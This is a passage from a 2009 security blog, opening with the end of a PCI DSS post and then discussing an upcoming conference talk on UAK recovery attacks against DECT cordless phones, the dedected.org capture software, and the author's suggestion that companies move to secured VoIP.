* For those not in the know, the CISP requirements were incorporated into an industry standard known as Payment Card Industry (PCI) Data Security Standard

Links (further reading) .:

http://blog.subjunctive.com/ –> Grave Concerns Blog
http://www.finextra.com/community/fullblog.aspx?id=2905 –> Finextra.com


Upcoming DECT Talk

Posted by ChrisJohnRiley on May 11, 2009

For those of you that follow my insane ramblings on a regular basis might just remember some posts I’ve made about DECT interception. As part of my ongoing interest in this area I’ve been keeping an eye on the dedected.org site and the researchers responsible for reversing parts of the DECT standard. Although not much has moved since the December 2008 software release and initial research, Ralf-Philipp Weinmann (University of Luxembourg) will be making a presentation at the upcoming EUSecWest 2009 in London (27/28 May). The talk, entitled “Efficient UAK Recovery attacks against DECT”, seems to hint at possible advances to the project. The UAK (User Authentication Key) is a 128-bit key used in the pairing process to authenticate the PP (Portable Part). Although this isn’t the point we’ve all been waiting for (an attack on the DECT Standard Cipher), it does represent the next step forward and could open the door to easier Man in the Middle type attacks. It could also allow attackers to connect to internal DECT systems and route calls through internal call switches. Great for free calls, social engineering, or maybe gaining access to restricted services (modems listening on internal extensions, voicemail systems, etc..). At the moment this is all speculation however. It’s a pity I can’t be at EUSecWest (I’m already doing too many conferences this year). However I’ll be keeping an eye on the slides as soon as they’re made public.

At present the dedected.org team have released software that allows for capturing unencrypted DECT telephone calls only. This doesn’t mean that encrypted calls can’t be captured, it simply means that they cannot currently be decoded into anything that makes sense. There is the chance the previously captured encrypted calls could be attacked and decoded in the future.

That notwithstanding, I doubt that the dedected.org team will be releasing anything new to decode encrypted traffic in the short term. At this stage they’ve already exposed the weaknesses in DECT, and without a solution to the issue, releasing a tool that captures and decodes encrypted traffic would only put individuals and companies using encrypted DECT in danger. That’s not to say there won’t be something in the mid to long term.

To prevent exposure, companies should start looking (if they’ve not already started) at alternative options to DECT telephones and headsets. VoIP seems like a viable alternative if it’s implemented over VPN or other secure channels. Only time will tell if this is the direction that people head however.
